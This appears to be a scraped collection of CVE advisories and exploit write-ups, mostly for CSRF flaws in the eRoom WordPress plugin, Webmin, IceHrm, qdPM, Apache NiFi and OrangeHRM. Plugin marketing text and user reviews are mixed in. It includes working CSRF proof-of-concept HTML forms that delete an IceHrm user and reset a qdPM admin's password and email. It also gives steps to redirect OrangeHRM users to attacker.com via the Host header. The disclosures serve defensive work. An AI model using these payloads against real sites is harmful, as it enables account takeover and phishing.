Cross-Site Request Forgery (CSRF) in StylemixThemes eRoom – Zoom Meetings & Webinar (WordPress plugin) <= 1.3.7 allows an attacker to Sync with Zoom Meetings.

**eroom-zoom-meetings-webinar**

**Software**

**eRoom – Zoom Meetings & Webinar**

**Vulnerable Versions**

**<= 1.3.7**

**Fixed in version**

**1.3.8**

**CVE**

**CVE-2022-25614**

**References**

**Credits**

**Classification**

**Cross Site Request Forgery (CSRF)**

**OWASP Top 10**

**A5: Broken Access Control**

**Disclosure Date**

**2022-04-11**

**CVSS 3.0 score**

**Are your websites subject to this vulnerability?**

**Details**

**Cross-Site Request Forgery (CSRF) vulnerability leading to Sync with Zoom Meetings discovered by Ex.Mi (Patchstack) in WordPress eRoom plugin (versions <= 1.3.7).**

**Solution**

**Update the WordPress eRoom plugin to the latest available version (at least 1.3.8).**

**Found a vulnerability that puts your sites at risk?**

**Found a vulnerability? Help us secure the web and join our community of ethical hackers.**

**Are you the developer of this software? Hire our researchers for a thorough security audit.**

CVE-2022-25614: WordPress eRoom plugin <= 1.3.7 - Cross-Site Request Forgery (CSRF) vulnerability leading to Sync with Zoom Meetings - Patchstack

Cross-Site Request Forgery (CSRF) in StylemixThemes eRoom – Zoom Meetings & Webinar (WordPress plugin) <= 1.3.8 allows cache deletion.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Remote type of work requires powerful tools to make sure all the business processes correspond to the level and are done without any loss.  
Video conferences, online meetings, and chat sessions play a significant role in providing and maintaining communication between participants and contribute to smooth collaboration in terms of distance interaction.

To make the process even more convenient, StylemixThemes developed eRoom – Zoom Meetings & Webinar WordPress Plugin to ensure you have a strong tool supporting your business.

⭐ Upgrade to eRoom Pro Features  
⭐ eRoom Documentation

eRoom plugin is natively integrated into bestselling WordPress themes:  
⭐ MasterStudy — Education WordPress Theme  
⭐ Consulting — Business & Corporate WordPress Theme

**Introducing eRoom – Zoom Meetings & Webinar WordPress Plugin**

eRoom – Zoom Meetings & Webinar WordPress Plugin provides you with great functionality of managing Zoom meetings, scheduling options, and users directly from your WordPress dashboard.  
The plugin is a free yet robust and reliable extension that enables direct integration of the world’s leading video conferencing tool Zoom with your WordPress website.

With the help of the plugin, you will be able to create and manage meetings making it easier for every user to participate.

**Zoom Webinars**

Zoom Webinars are an ideal solution for virtual lectures. It is a perfect way to conduct big online events and distribute them to large audiences.

Webinars make a valuable addition to the eRoom plugin and reflect the best practice of a one-to-many communication approach.

Webinars will be perfect for you if you:

*   offer virtual lectures;
*   distribute to a large audience;
*   use the listen-only mode;
*   want to diversify your content;
*   want to manage webinars directly from your dashboard.

With flexible Zoom plans, the number of webinar participants can be up to 10,000.

In eRoom plugin, you will be able to create webinars, add them to any page of the site, and sell them as WooCommerce Products. A convenient management system will be enjoyable for you and beneficial to your customers.

**Who Is It For?**

eRoom – Zoom Meetings & Webinar Plugin is a comprehensive tool, which is an indispensable and necessary solution for lots of educational institutions, consulting firms, and remote businesses.  
It is especially helpful while adapting to distance work. The plugin and the idea of video conferencing are applicable to a wide range of niches, especially it is beneficial for online learning.

This tool is suitable for conducting online training sessions, seminars and lectures, business meetings and online consultations.  
The service is developed for collaboration, training, and technical support and mainly aims to enhance the engagement among the participants.  
eRoom – Zoom Meetings & Webinar helps to shorten the distance and connect you with your coworkers regardless of your location.

**Main Features**

With eRoom – Zoom Meetings & Webinar Plugin you do not need to obtain and combine any other video conferencing solutions.  
It is a complete, comprehensive tool that connects your website with the ultimate eRoom – Zoom Meetings & Webinar service and provides you with lots of control options.

Features:

*   Compatible with WordPress
*   Provides integration of Zoom on WordPress
*   Compatible with Zoom API
*   Enables Zoom video conferencing features
*   Provides shortcode to conduct the meeting on any WordPress page
*   Has admins area to manage the meetings
*   Allows to add and manage users
*   Includes Zoom performance and engagement reports

**Syncing meetings with Google Calendar**

eRoom allows syncing meetings with calendars. You can easily import the meeting file to iCal or duplicate the information to Google Calendar. The only thing you have to do is save the event and set the reminder if you want. This feature is especially useful for those who have lots of appointments, making it easier to keep track and access meetings from their calendar.

**eRoom purchasable meetings**

For those who want to monetize the meetings or offer the customers something new, you can always upgrade eRoom plugin with the paid addon — eRoom purchasable meetings.

eRoom purchasable meetings will add more value to your business. With this tool, you can make your video conferences and webinars available for purchase as WooCommerce products. A great way to monetize your services in a digital format. Offer your customers consultations, and training as live sessions or recorded webinars and let them choose and buy the favorite product.

**Recurring Meetings**

Recurring meetings and webinars is another paid add-on that gives you the ability to create Zoom meetings with recurrency.  
It is enough to create a single meeting and each occurrence will be using the same meeting ID and settings.

Recurring events Increase engagement and productivity. It is especially beneficial for managers and team leads. It also allows holding regular check-ins making sure every user or customer is involved.

**Simple in usage**

Interaction between eRoom and WooCommerce plugins makes it very easy to create a purchasable meeting. All you need to do is to add your meeting as a new WooCommerce product which makes it available for users to buy. Users can join the meeting directly from the browser or Zoom app. There is also a possibility for them to interact with the host via messages.

*   Easily use it on any WordPress website without interruptions.
*   Integrate your website with the most popular conferencing platform Zoom.
*   Apply all the major video conferencing features from Zoom on your site.
*   Use shortcodes and builder modules to add meetings to any site page.
*   Enjoy an intuitive admins panel and effortlessly adjust settings.

**Promote your services in a new way**

Use purchasable meetings as a marketing tool. Find a new audience that will be interested in online webinars and will be ready to pay for it.

**Why You Should Use the Plugin**

eRoom – Zoom Meetings & Webinar WordPress plugin is the perfect solution for your website if you are interested in broadcasting live or hosting virtual events in real-time.  
High-definition video and audio and the ability to join for many participants are the primary things you get.  
Companies can stay connected with text, image, and audio file delivery over instant messaging communications.

The main objective of this plugin is to enable the meetings and joining them straight from the page of your WordPress website.  
The plugin lets you schedule meetings from the WordPress dashboard. There is a shortcode that is generated automatically and can be added to the page,  
so users can see a countdown before the meeting starts and join the meeting directly from the page.

The plugin allows you to use all the features provided by Zoom, such as:

*   Video conference option.
*   Manage participants
*   Live chat
*   Screen sharing option
*   Full-screen mode

**More Awesome Free Plugins by Stylemix**

⭐ Cost Calculator & Price Estimation Plugin  
⭐ Zoom Meetings and Webinars Plugin — eRoom  
⭐ BookIt – a free booking calendar plugin  
⭐ MasterStudy – All-in-One WordPress LMS Plugin  
⭐ Free Classifieds and Listings Plugin – uListing

This section describes how to install the plugin and get it working.

1.  Upload the plugin files to the `/wp-content/plugins/` directory, or install the plugin through the WordPress plugins screen directly.
2.  Activate the plugin through the ‘Plugins’ screen in WordPress
3.  Please find more details on Plugin Installation in documentation
4.  Set Up Page in Menu -> Zoom.

**How do users join the conference?**

Users will have two options. They can join the conference either via the browser or in the Zoom app. Both options provide the same experience.

**How can I manage the meetings, do I have to use Zoom itself?**

Everything is held in your dashboard, the plugin enables the full integration with the Zoom platform. So you use only the admin panel and create and manage Zoom meetings directly on your website.

**Do I have to create a separate page for the meeting or can I paste it to any site page?**

There are shortcodes and popular page builders modules that will help you to insert conference to any page on your website.

**Is it compatible with my theme?**

Yes, the plugin is compatible with any WordPress theme. Install it and enjoy the flawless performance.

**Am I able to manage users?**

The plugin settings allow you to add and manage users. But, you should remember that you can add users in accordance with the Zoom Plans, so they will be active for the chosen plan. More information about Zoom pricing plans you can find here: https://zoom.us/pricing

**Do I need a Zoom account?**

Yes, you should be registered in Zoom. Also, on the plan you are using there depends the number of hosts and users you can add.

**What if I want to save the webinar?**

You can do it, just use the URL link of the video, so users could watch it later. In addition to this, with eRoom purchasable meetings plugin you will be able even to sell your webinars and meetings. Learn more: https://stylemixthemes.com/zoom-meetings-webinar-plugin/

![](https://secure.gravatar.com/avatar/61bf65a54c1d67860455f03aff4286b6?s=60&d=retro&r=g)

I installed this plugin to test vs the Video Conferencing with Zoom plugin which I had already setup. I made a new meeting and enbedded the shortcode into a post. When I went to view the new meeting it took me to a page not found. When I embedded the meeting into a post and viewed the post it displayed a very nice time counter showing the time until the meeting would start, but when I tried to view the meeting in my browser it took me to the page not found. I made the meeting and published it but somehow it couldn't be found when I clicked 'view post' - what's up with that? I'm not going to waste my time trying to figure out something that should be easy. I'll stick with Video Conferencing with Zoom I guess, though it isn't perfect.

![](https://secure.gravatar.com/avatar/c29bc97c851ccc58116de75fa67119d2?s=60&d=retro&r=g)

![](https://secure.gravatar.com/avatar/a3a804c142a50fd0acd23bc9c00b8623?s=60&d=retro&r=g)

It is one of the best WordPress plugins I've ever used.

![](https://secure.gravatar.com/avatar/7b05f5217be5e6baef35ae2853b2df53?s=60&d=retro&r=g)

The free version of eRoom provides good amount of features. They have features which can convert a website to a live one. And the pro version has even greater features. We look forward to buy its pro version too for our startup after sometime

![](https://secure.gravatar.com/avatar/345dd3e75f90f478ad1b0f2bfb886dd3?s=60&d=retro&r=g)

Good plugin and very simple to use. One point to improve : Impossible to have the interpreter function. is a relase is planned ?

![](https://secure.gravatar.com/avatar/3e3d18725f08d08ccb952f436a1b360a?s=60&d=retro&r=g)

An excellent plug-in that meets all my business needs

Read all 50 reviews

“eRoom – Zoom Meetings & Webinar” is open source software. The following people have contributed to this plugin.

Contributors

*   ![](https://secure.gravatar.com/avatar/0231b4ceb0d31b5de8d2d3d430db935d?s=32&d=mm&r=g) Stylemix

**1.3.9**

*   Security update

**1.3.8**

*   Security update

**1.3.7**

*   fixed: Check ‘wp\_get\_current\_user’ function

**1.3.6**

*   fixed: Mailchimp pluggable conflict fix

**1.3.5**

*   updated: Compatibility with WordPress 5.9
*   fixed: Minor visual bugs

**1.3.4**

New: MailChimp Integration. The notification with options to add the user’s data in our newsletters after activating the plugin

**1.3.3**

*   fixed: Removed Freemius SDK from plugin’s core (see the previous update about Freemius SDK)

**1.3.2**

*   new: Freemius SDK for better analytics and understanding

**1.3.1**

*   new: Added new feature roadmap for eRoom

**1.3.0**

*   new: Approve or block entry for users from specific countries/regions
*   new: New meeting e-mail notification for host
*   new: eRoom meeting frontend editing via Elementor
*   fixed: Daylight saving time in time zones
*   fixed: Date format on meeting page

**1.2.9**

*   updated: Nuxy submodule

**1.2.8**

*   fixed: Admin Dashboard notifications lag

**1.2.7**

*   updated: Admin Dashboard notifications updated

**1.2.6**

*   fixed: PRO Features button slider error
*   fixed: Minor PHP errors

**1.2.5**

*   new: Generate password option added

**1.2.4**

*   added: Feedback module inside eRoom settings
*   added: Roadmap voting in eRoom settings

**1.2.3**

*   new: iCal Export and Google Calendar added
*   fixed: Meeting grid styling on mobile devices
*   fixed: Checkbox fields “Require authentication to join for webinar”
*   updated: Shortcode for recurring meetings and category
*   updated: Meetings/webinars connected with Zoom Conference products excluded from the grid and hidden join button with password on single page

**1.2.2**

*   added: Table Details for recurring on admin panel
*   added: Registration form for webinar type
*   updated: changed label/description for fields
*   updated: renamed wpcfto to nuxy
*   updated: Zoom Web SDK API updated to 1.9.1
*   fixed: changed priority for eroom single page and fixed countdown

**1.2.1**

*   fixed: Meetings/webinars deleted from WordPress were not deleted from Zoom (now these will be deleted after deleted from trash)
*   fixed: Image appearance for eRoom shortcodes items

**1.2.0**

*   updated: Pagination for Users section
*   updated: Countdown for three-digit number of days
*   fixed: Zoom token expiration issue
*   fixed: Console error testTool.isMobileDevise is not a function
*   fixed: Set current date if date field is empty
*   fixed: time zone for Azores
*   new: Go Pro page added

**1.1.9**

*   updated: Zoom Web SDK API updated to 1.8.5
*   fixed: Zoom API 2.0 incompatibility issues fixed
*   fixed: Enforce Login and Join Before Host issues fixed
*   improvement: Join in browser 2nd step deleted – the users participate the meeting directly after clicking Join in browser button as attendee
*   improvement: Waiting room option added to Webinar and Meeting

**1.1.8**

*   **added**: Stylemix announcements in admin dashboard

**1.1.7**

*   fixed: time zone changes according to zoom

**1.1.5**

*   improvements: Integration with Bookit Calendar Appointments

**1.1.4**

*   fixed: show alternative host
*   fixed: issue with setting the meeting date later than 1970 that occurs in 32 bit system
*   improvements: hide api secret in frontend.
*   translations: changed meeting setting words ‘Host Join Start’ to ‘Host video’, ‘Start after participants’ to ‘Participant video’

**1.1.3**

*   fixed: date translations in webinar/meeting info
*   fixed: default webinar/meeting date was set to 1st Jan 1970 instead of current time
*   cosmetics: styled meeting/product views in Pearl theme

**1.1.2**

*   WPCFTO Framework updated

**1.1.1**

*   Zoom Meeting Start Time issue fixed.
*   Zoom Synchronization Timezone problem fixed.
*   Readme updated

**1.1.0**

*   Zoom Webinars Integrated.
*   Zoom Meetings & Webinars Synchronization feature added.
*   Single Webinar Shortcode added – \[stm\_zoom\_webinar post\_id=”” hide\_content\_before\_start=””\]
*   Zoom Webinar WPBakery Page Builder element added
*   Zoom Webinar Elementor Page Builder element added
*   Zoom Webinar Email field added to Join in Browser feature
*   Settings Quicklink added to Plugins page.
*   Default Timezone set to Meeting Settings.
*   Zoom menu name changed into eRoom.
*   STM\_ZOOM Class name changed into StmZoom.

**1.0.6**

*   Minor bug fixes.

**1.0.4**

*   Minor bug fixes.

**1.0.3**

*   WPBakery shortcode bug fixed.

**1.0.2**

*   Meetings Grid shortcake added
*   Single Meeting page added
*   Minor bug fixes.

**1.0.1**

*   Minor bug fixes.

**1.0**

*   First Version of Plugin.

CVE-2022-25615: eRoom – Zoom Meetings & Webinar

The Export All URLs WordPress plugin before 4.3 does not have CSRF in place when exporting data, which could allow attackers to make a logged in admin export all posts and pages (including private and draft) into an arbitrary CSV file, which the attacker can then download and retrieve the list of titles for example

CVE-2022-0914

A Cross-site request forgery (CSRF) vulnerability exists in Webmin 1.973 through the File Manager feature.

**..| CSRF\_to\_Command\_Injection2 |..****Description :**

**Exploiting a Cross-site request forgery (CSRF) attack to get a Command Injection through the Webmin's File Manager feature  
**  

**Tested Version :****Webmin 1.973 ( GitHub's latest version 07/03/2021 )**  
**Attack Type:****Remote**  
**Impact :  
****Command Execution****eXploit's C0de POC :**

![](https://github.com/Mesh3l911/CVE-2021-32162/raw/main/exploitPOC.png)

**Vendor of Product :**`https://www.webmin.com`**Additional Information :****`"Webmin is a web-based system administration tool for Unix-like servers, and services with over 1,000,000 installations worldwide. Using it, it is possible to configure operating system internals, such as users, disk quotas, services or configuration files, as well as modify, and control open-source apps, such as BIND DNS Server, Apache HTTP Server, PHP, MySQL, and many more"` According to Webmin's GitHub****Discoverers :****Mesh3l\_911 & Z0ldyck  
Twitter: `@mesh3l_911` ,`@electronicbots`  
**

CVE-2021-32162: GitHub - Mesh3l911/CVE-2021-32162: Exploiting a Cross-site request forgery (CSRF) attack to get a Command Injection through the Webmin's File Manager feature

A cross-site request forgery (CSRF) vulnerability exists in Webmin 1.973 via the Scheduled Cron Jobs feature.

**..| CSRF to RCE CRON |..****Description :**

**Exploiting a Cross-site request forgery (CSRF) attack to get a Remote Command Execution (RCE) through the Webmin's Scheduled Cron Jobs feature  
**  

**Tested Version :****Webmin 1.973 ( GitHub's latest version 07/03/2021 )**  
**Attack Type:****Remote**  
**Impact :  
****Remote Command Execution****eXploit's C0de POC :**

![](https://github.com/Mesh3l911/CVE-2021-32156/raw/main/exploitPOC.png)

**Vendor of Product :**`https://www.webmin.com`**Additional Information :****`"Webmin is a web-based system administration tool for Unix-like servers, and services with over 1,000,000 installations worldwide. Using it, it is possible to configure operating system internals, such as users, disk quotas, services or configuration files, as well as modify, and control open-source apps, such as BIND DNS Server, Apache HTTP Server, PHP, MySQL, and many more"` According to Webmin's GitHub****Discoverers :****Mesh3l\_911 & Z0ldyck  
Twitter: `@mesh3l_911` , `@electronicbots`  
**

CVE-2021-32156: GitHub - Mesh3l911/CVE-2021-32156: Exploiting a Cross-site request forgery (CSRF) attack to get a Remote Command Execution (RCE) through the Webmin's Scheduled Cron Jobs feature

A Cross-site request forgery (CSRF) vulnerability exists in Webmin 1.973 via the Upload and Download feature.

**..| CSRF\_to\_Command\_Injection1 |..****Description :**

**Exploiting a Cross-site request forgery (CSRF) attack to get a Command Injection through the Webmin's Upload and Download feature  
**  

**Tested Version :****Webmin 1.973 ( GitHub's latest version 07/03/2021 )**  
**Attack Type:****Remote**  
**Impact :  
****Command Execution****eXploit's C0de POC :**

![](https://github.com/Mesh3l911/CVE-2021-32159/raw/main/exploitPOC.png)

**Vendor of Product :**`https://www.webmin.com`**Additional Information :****`"Webmin is a web-based system administration tool for Unix-like servers, and services with over 1,000,000 installations worldwide. Using it, it is possible to configure operating system internals, such as users, disk quotas, services or configuration files, as well as modify, and control open-source apps, such as BIND DNS Server, Apache HTTP Server, PHP, MySQL, and many more"` According to Webmin's GitHub****Discoverers :****Mesh3l\_911 & Z0ldyck  
Twitter: `@mesh3l_911` ,`@electronicbots`  
**

CVE-2021-32159: GitHub - Mesh3l911/CVE-2021-32159: Exploiting a Cross-site request forgery (CSRF) attack to get a Command Injetion through the Webmin's Upload and Download feature

A Cross-Site Request Forgery (CSRF) in IceHrm 31.0.0.OS allows attackers to delete arbitrary users or achieve account takeover via the app/service.php URI.

    # Exploit Title: ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion# Date: 29/03/2022# Exploit Author: Devansh Bordia# Vendor Homepage: https://icehrm.com/# Software Link: https://github.com/gamonoid/icehrm/releases/tag/v31.0.0.OS# Version: 31.0.0.OS#Tested on: Windows 10# CVE: CVE-2022-265881. About - ICEHRMIceHrm employee management system allows companies to centralize confidential employee information and define access permissions to authorized personnel to ensure that employee information is both secure and accessible.2. Description:The application has an update password feature which has a CSRF vulnerability that allows an attacker to change the password of any arbitrary user leading to an account takeover.3. Steps To Reproduce:1.) Now login into the application and go to users.2.) After this add an user with the name Devansh.3.) Now try to delete the user and intercept the request in burp suite. We can see no CSRF Token in request.4.) Go to any CSRF POC Generator: https://security.love/CSRF-PoC-Genorator/5.) Now generate a csrf poc for post based requests with necessary parameters.6.) Finally open that html poc and execute in the same browser session.7.) Now if we refresh the page, the devansh is deleted to csrf vulnerability.4. Exploit POC (Exploit.html)<html><form enctype="application/x-www-form-urlencoded" method="POST"  action="http://localhost:8070/app/service.php"><table><tr><td>t</td><td><input type="text" value="User" name="t"></td></tr><tr><td>a</td><td><input type="text" value="delete" name="a"></td></tr><tr><td>id</td><td><input type="text" value="6" name="id"></td></tr></table><input type="submit" value="http://localhost:8070/app/service.php"> </form></html>

CVE-2022-26588: ICEHRM 31.0.0.0S Cross Site Request Forgery ≈ Packet Storm

qdPM 9.2 allows Cross-Site Request Forgery (CSRF) via the index.php/myAccount/update URI.

# Exploit Title: qdPM 9.2 - Cross-site Request Forgery (CSRF)# Google Dork: NA# Date: 03/27/2022# Exploit Author: Chetanya Sharma @AggressiveUser# Vendor Homepage: https://qdpm.net/# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download# Version: 9.2# Tested on: KALI OS# CVE : CVE-2022-26180#---------------Steps to Exploit :   1) Make an HTML file of given POC (Change UserID field Accordingly)and host it.  2) send it to victim.<html><title>qdPM Open Source Project Management - qdPM 9.2 (CSRF POC)</title>  <body>  <script>history.pushState('', '', '/')</script>    <form action="https://qdpm.net/demo/9.2/index.php/myAccount/update" method="POST">      <input type="hidden" name="sf_method" value="put" />      <input type="hidden" name="users[id]" value="1" />       <input type="hidden" name="users[photo_preview]" value="" />      <input type="hidden" name="users[name]" value="AggressiveUser" />      <input type="hidden" name="users[new_password]" value="TEST1122" />      <input type="hidden" name="users[email]" value="administrator@Lulz.com" />      <input type="hidden" name="users[photo]" value="" />      <input type="hidden" name="users[culture]" value="en" />      <input type="submit" value="Submit request" />    </form>  </body></html>

CVE-2022-26180: qdPM 9.2 Cross Site Request Forgery ≈ Packet Storm

When creating or updating credentials for single-user access, Apache NiFi wrote a copy of the Login Identity Providers configuration to the operating system temporary directory. On most platforms, the operating system temporary directory has global read permissions. NiFi immediately moved the temporary file to the final configuration directory, which significantly limited the window of opportunity for access. NiFi 1.16.0 includes updates to replace the Login Identity Providers configuration without writing a file to the operating system temporary directory.

CVE-2022-26850: Apache NiFi Security Reports

OrangeHRM 4.10 is vulnerable to a Host header injection redirect via viewPersonalDetails endpoint.

**Environment details**  
OrangeHRM version: 4.10  
OrangeHRM source: Release build from Sourceforge or Git clone  
Platform: Ubuntu  
PHP version: 7.3.33  
Database and version: MariaDB 10.3  
Web server: Apache 2.4.52

If applicable:  
Browser: Firefox

**Describe the bug**  
When an authenticated user submits the "Personal Details" form, a 302 redirect to the "Personal Details" URL is sent in the response. Following is a request and its response—

    POST /symfony/web/index.php/pim/viewPersonalDetails HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 332
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/symfony/web/index.php/pim/viewMyDetails
    Cookie: Loggedin=True; _orangehrm=1ba9si14k85n5cfdc39frt4mis
    Upgrade-Insecure-Requests: 1
    
    personal%5B_csrf_token%5D=f80390168c630daa51a6ed85467cad78&personal%5BtxtEmpID%5D=2&personal%5BtxtEmpFirstName%5D=Pranav&personal%5BtxtEmpMiddleName%5D=&personal%5BtxtEmpLastName%5D=S&personal%5BtxtOtherID%5D=&personal%5BtxtLicExpDate%5D=yyyy-mm-dd&personal%5BoptGender%5D=1&personal%5BcmbMarital%5D=Single&personal%5BcmbNation%5D=0
    

Response:

    HTTP/1.1 302 Found
    Date: Wed, 09 Mar 2022 05:49:01 GMT
    Server: Apache/2.4.29 (Ubuntu)
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Location: http://localhost/symfony/web/index.php/pim/viewPersonalDetails/empNumber/2
    Content-Length: 148
    Connection: close
    Content-Type: text/html; charset=utf-8
    
    

It was noticed that upon manipulating the Host header, in the POST request, to an arbitrary domain, it was possible to inject the Host header into the URL redirection in the 302 response. A user would then be redirected to the arbitrary domain. For example, the domain "example.com" can be passed as the value of the Host header in the POST request. The resulting 302 response redirects the user to http://example.com/symfony/web/index.php/pim/viewPersonalDetails/empNumber/2. Due to the nature of this vulnerability, it can be used in phishing attacks.

Following are the endpoints in the OrangeHRM application that are vulnerable to the Host Header Injection Redirect vulnerability:

1.  /symfony/web/index.php/pim/viewPersonalDetails
2.  /symfony/web/index.php/auth/validateCredentials

**To Reproduce**

1.  Login to the OrangeHRM application
2.  Navigate to "My Info"
3.  Under "Personal Details", click on "Edit"
4.  Turn on Intercept in Burp Suite (or any other web proxy)
5.  Click on "Save"
6.  Change the value of the `Host` header to `attacker.com`
7.  Click on Forward in Burp and turn off Intercept
8.  You will notice that the page gets redirected to `http://attacker.com/symfony/web/index.php/pim/viewPersonalDetails/empNumber/X`

**Expected behavior**  
A 404 error.

**What do you see instead:**  
A 302 redirect to the malicious domain.

**Screenshots**  
![image](https://user-images.githubusercontent.com/37404408/157669760-53d01d4d-03a2-4f62-8216-e4c120175c8a.png)  
![image](https://user-images.githubusercontent.com/37404408/157669846-c47ca311-a7c6-444a-8275-defdec31003b.png)

Tag

#csrf